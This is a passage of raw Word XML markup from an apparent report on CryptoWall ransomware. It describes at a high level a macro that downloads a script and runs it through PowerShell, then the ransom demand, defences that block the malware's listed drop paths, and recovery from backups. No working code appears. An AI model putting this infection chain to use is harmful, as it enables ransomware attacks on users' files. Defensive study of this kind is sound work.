        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F6632" w:rsidP="006258FF" w:rsidRDefault="008F6632" w14:paraId="25BA6D39" w14:textId="2D07F78C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Microsoft Word’s macro fires on </w:t>
      </w:r>
      <w:r w:rsidR="009F2107">
        <w:t xml:space="preserve">attached </w:t>
      </w:r>
      <w:r w:rsidR="00006ED8">
        <w:t xml:space="preserve">document load, by using </w:t>
      </w:r>
      <w:r w:rsidR="009F2107">
        <w:t xml:space="preserve">XMLHTTP the document downloads a script and executes it from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009F2107">
        <w:t xml:space="preserve">word </w:t>
      </w:r>
      <w:r w:rsidR="00F02F28">
        <w:t xml:space="preserve"> via</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F02F28">
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r w:rsidR="009F2107">
        <w:t>and the payload downloaded by System Users.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="162133318"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C371DE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C371DE">
            <w:instrText xml:space="preserve"> CITATION loc18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C371DE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r w:rsidR="00C371DE">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="009F2107" w:rsidP="006258FF" w:rsidRDefault="009F2107" w14:paraId="39ED0693" w14:textId="2DC23351">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B4513" w:rsidP="006258FF" w:rsidRDefault="003B4513" w14:paraId="3C9EA891" w14:textId="0CF5DE26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C00769B" wp14:editId="2CA943C1">
            <wp:extent cx="4991102" cy="3820773"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1941395920" name="picture" descr="Follow TCP Stream">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9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4991102" cy="3820773"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003A5722" w:rsidR="003A5722" w:rsidP="006258FF" w:rsidRDefault="003A5722" w14:paraId="4F5806B6" w14:textId="39E58FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r w:rsidR="00E71B25">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">code run via coded download from the </w:t>
      </w:r>
      <w:r w:rsidR="00DA5CC3">
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MS Word macro</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:id w:val="-1421790269"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="008355D1">
            <w:rPr>
              <w:i/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="008355D1">
            <w:rPr>
              <w:i/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION loc18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="008355D1">
            <w:rPr>
              <w:i/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:i/>
              <w:noProof/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r w:rsidR="008355D1">
            <w:rPr>
              <w:i/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00843360" w:rsidP="006258FF" w:rsidRDefault="00843360" w14:paraId="3EE65BA4" w14:textId="2656748D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00843360" w:rsidP="006258FF" w:rsidRDefault="03F6C9C5" w14:paraId="5DC2141F" w14:textId="2A788D08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Beyond this point, PowerShell has downloaded the payload text file and ‘executed’ it within PowerShell. It may happen instantly, it may happen over a short period of time </w:t>
      </w:r>
      <w:r w:rsidR="005C7D93">
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:t>System Users may be presented a popup not unlike the following.</w:t>
      </w:r>
      <w:r w:rsidR="005C7D93">
        <w:t xml:space="preserve"> System Users files have now been encrypted</w:t>
      </w:r>
      <w:r w:rsidR="000E1624">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkStart w:name="_GoBack" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C306D9" w:rsidP="006258FF" w:rsidRDefault="00C306D9" w14:paraId="079E198E" w14:textId="5747002D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C306D9" w:rsidP="006258FF" w:rsidRDefault="00C306D9" w14:paraId="59DEA2E6" w14:textId="6A6847B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="505D3200" wp14:editId="017DB21B">
            <wp:extent cx="5114925" cy="3136265"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6985"/>
            <wp:docPr id="777231873" name="picture" descr="CryptoWall Decryption Service">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1">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5114925" cy="3136265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00323110" w:rsidR="00323110" w:rsidP="03F6C9C5" w:rsidRDefault="00323110" w14:paraId="3D93A81F" w14:textId="6B59534D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="03F6C9C5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Popup requesting bitcoin as payment for System </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="03F6C9C5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Userss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="03F6C9C5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> encrypted files</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:id w:val="674463982"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00DB23E3">
            <w:rPr>
              <w:i/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DB23E3">
            <w:rPr>
              <w:i/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION cry \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00DB23E3">
            <w:rPr>
              <w:i/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:i/>
              <w:noProof/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t>[12]</w:t>
          </w:r>
          <w:r w:rsidR="00DB23E3">
            <w:rPr>
              <w:i/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00CE230A" w:rsidP="00521D99" w:rsidRDefault="00CE230A" w14:paraId="6B98FA01" w14:textId="0AEB3ACB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B41F1E" w:rsidP="00521D99" w:rsidRDefault="003423BF" w14:paraId="61FA57C7" w14:textId="607BAF23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bitcoin is the current choice of currency for the </w:t>
      </w:r>
      <w:r w:rsidR="00130082">
        <w:t>Cybercrime criminals</w:t>
      </w:r>
      <w:r w:rsidR="001A2800">
        <w:t>. Bitcoin is a form of Cryptocurrency</w:t>
      </w:r>
      <w:r w:rsidR="00EB5B3F">
        <w:t xml:space="preserve"> that is anonymous and unregulated by the financial organisations. Although ideologically it provides a digital currency that can be used across the world outside of all financial institution it is also used to purchas</w:t>
      </w:r>
      <w:r w:rsidR="00254830">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00EB5B3F">
        <w:t xml:space="preserve"> items and services</w:t>
      </w:r>
      <w:r w:rsidR="00254830">
        <w:t xml:space="preserve">, that can be illegal </w:t>
      </w:r>
      <w:r w:rsidR="001814EF">
        <w:t>through the internet.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2056810903"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00FE6E33">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FE6E33">
            <w:instrText xml:space="preserve"> CITATION bit18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FE6E33">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[13]</w:t>
          </w:r>
          <w:r w:rsidR="00FE6E33">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00B3482F" w:rsidP="00521D99" w:rsidRDefault="00B3482F" w14:paraId="39533722" w14:textId="26535C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD1E1F" w:rsidP="00521D99" w:rsidRDefault="00951F1B" w14:paraId="2B5227D8" w14:textId="3B104F9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once You pay the ransom </w:t>
      </w:r>
      <w:r w:rsidR="004B6307">
        <w:t xml:space="preserve">you get a decryption key that you can use to decrypt your files. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-908062704"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00304D84">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00304D84">
            <w:instrText xml:space="preserve"> CITATION cry18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00304D84">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[14]</w:t>
          </w:r>
          <w:r w:rsidR="00304D84">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00B3482F" w:rsidP="00521D99" w:rsidRDefault="00B3482F" w14:paraId="2A183222" w14:textId="34B55C58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00F9163A" w:rsidR="7A011108" w:rsidP="7A011108" w:rsidRDefault="7A011108" w14:paraId="5E7ADFED" w14:textId="4559087E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9163A">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Defence Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530FA5" w:rsidP="00530FA5" w:rsidRDefault="00530FA5" w14:paraId="38988655" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00530FA5" w:rsidP="00530FA5" w:rsidRDefault="004B6F87" w14:paraId="434D6531" w14:textId="20EE4E48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A preventative measure in initial defence against Cryptowall is to run patches provided by Microsoft to </w:t>
      </w:r>
      <w:r w:rsidR="00B511E3">
        <w:t>disallow access to certain file paths</w:t>
      </w:r>
      <w:r w:rsidR="00431188">
        <w:t xml:space="preserve"> so the Cryptowall executable can</w:t>
      </w:r>
      <w:r w:rsidR="00FE0DD3">
        <w:t>not run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0DD3" w:rsidP="00530FA5" w:rsidRDefault="00FE0DD3" w14:paraId="398BE7C4" w14:textId="20EE4E48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE0DD3" w:rsidP="00530FA5" w:rsidRDefault="000E1624" w14:paraId="521FE0A3" w14:textId="20EE4E48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidRPr="7300FB8F" w:rsidR="7300FB8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Helvetica"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://support.microsoft.com/kb/310791</w:t>
        </w:r>
        <w:r w:rsidR="00FE0DD3">
          <w:br/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidRPr="7300FB8F" w:rsidR="7300FB8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Helvetica"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://technet.microsoft.com/en-us/library/cc786941(v=ws.10).aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FE0DD3" w:rsidP="00530FA5" w:rsidRDefault="00FE0DD3" w14:paraId="21D28AA2" w14:textId="20EE4E48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE0DD3" w:rsidP="00530FA5" w:rsidRDefault="00C96DDA" w14:paraId="68F712A2" w14:textId="1E9B551E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Below are the paths that the Cryptowall trojan executable uses:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C96DDA" w:rsidP="00530FA5" w:rsidRDefault="00C96DDA" w14:paraId="45132A2C" w14:textId="1E9B551E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C96DDA" w:rsidP="00530FA5" w:rsidRDefault="00C96DDA" w14:paraId="0D104BD1" w14:textId="1E9B551E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\&lt;random&gt;\&lt;random&gt;.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\&lt;User&gt;\AppData\Local\&lt;random&gt;.exe (Vista/7/8)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\&lt;User&gt;\AppData\Local\&lt;random&gt;.exe (Vista/7/8)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Documents and Settings\&lt;User&gt;\Application Data\&lt;random&gt;.exe (XP)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Documents and Settings\&lt;User&gt;\Local Application Data\&lt;random&gt;.exe (XP)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%Temp%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C96DDA" w:rsidP="00530FA5" w:rsidRDefault="00C96DDA" w14:paraId="01575DAA" w14:textId="1E9B551E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C96DDA" w:rsidP="00530FA5" w:rsidRDefault="00FF3FD2" w14:paraId="0FD83085" w14:textId="1BDBA99A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00062E42">
        <w:t>Crypto prevent</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-911995184"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION cry181 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[15]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> software </w:t>
      </w:r>
      <w:r w:rsidR="00025048">
        <w:t>performs a function on installation that blocks the paths mentioned above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3DAD" w:rsidP="00530FA5" w:rsidRDefault="00FF3DAD" w14:paraId="3FEB08F9" w14:textId="5D6EE8FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3DAD" w:rsidP="00FF3DAD" w:rsidRDefault="00F9163A" w14:paraId="5F63A1FA" w14:textId="5D6EE8FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9163A">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Recovery Methods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B332AF" w:rsidP="00B332AF" w:rsidRDefault="00B332AF" w14:paraId="32967127" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00B332AF" w:rsidR="00B332AF" w:rsidP="00B332AF" w:rsidRDefault="03F6C9C5" w14:paraId="0A1FDB0C" w14:textId="63C7FA79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>A recovery plan must include a system of backup for restoring encrypted files. System Users can restore the encrypted files by ensuring copies exist in the Cloud or within a suitable offline hardware storage unit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00B332AF" w:rsidR="00B332AF" w:rsidP="00B332AF" w:rsidRDefault="00B332AF" w14:paraId="53DAD52A" w14:textId="458BBC26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00553A8C" w:rsidP="00B9013C" w:rsidRDefault="03F6C9C5" w14:paraId="2F51C5E1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>File Recovery</w:t>
      </w:r>
      <w:r w:rsidR="00553A8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="03F6C9C5" w:rsidP="00B9013C" w:rsidRDefault="03F6C9C5" w14:paraId="47979431" w14:textId="1F7A3BB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cryptowall makes a copy of data files and encrypts them on copy, changing the header of the original files, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>effectly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hiding them. The more you use your computer after infection the higher the chance the original files will be overwritten as your operating system runs its own disk defragmentation that swaps space around as it indexes new files</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="986356974"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="009E426E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:instrText xml:space="preserve"> CITATION cry16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="009E426E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[16]</w:t>
          </w:r>
          <w:r w:rsidR="009E426E">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="03F6C9C5" w:rsidP="03F6C9C5" w:rsidRDefault="03F6C9C5" w14:paraId="69DF34AA" w14:textId="6FF506CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Shadow Volume Copy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D927D5" w:rsidP="00D927D5" w:rsidRDefault="00D927D5" w14:paraId="260F8C59" w14:textId="20E384A4">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">System users can also </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>restored</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the encrypted files via a shadow </w:t>
      </w:r>
      <w:r w:rsidR="00390CF1">
        <w:t>volume copy that you should have backed up on an external server or hard drive.</w:t>
      </w:r>
      <w:r w:rsidRPr="00390CF1" w:rsidR="00390CF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1682734942"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00390CF1">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00390CF1">
            <w:instrText xml:space="preserve"> CITATION cry16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00390CF1">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00390CF1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="009E426E" w:rsidR="00390CF1">
            <w:rPr>
